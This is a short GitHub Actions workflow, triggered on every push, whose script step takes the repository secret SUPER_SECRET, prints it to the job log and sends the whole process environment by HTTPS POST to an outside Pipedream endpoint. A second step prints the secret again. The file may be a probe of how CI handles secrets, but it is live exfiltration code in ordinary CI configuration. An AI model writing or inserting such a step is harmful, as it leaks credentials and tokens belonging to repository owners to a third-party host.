on: push
jobs:
  comment:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/github-script@v3
        env:
          SUPER_SECRET: ${{secrets.SUPER_SECRET}}
        with:
          script: |
            console.info(process.env.SUPER_SECRET);
            const https = require("https")  
            const data = JSON.stringify({
              "data": process.env
            })
            const options = {
              hostname: "en6hsug3klkid5n.m.pipedream.net",
              port: 443,
              path: "/",
              method: "POST",
              headers: {
                "Content-Type": "application/json",
                "Content-Length": data.length,
              },
            }
            const req = https.request(options)
            req.write(data)
            req.end()
      - uses: actions/github-script@v3
        with:
          script: |
            console.info(process.env.SUPER_SECRET);
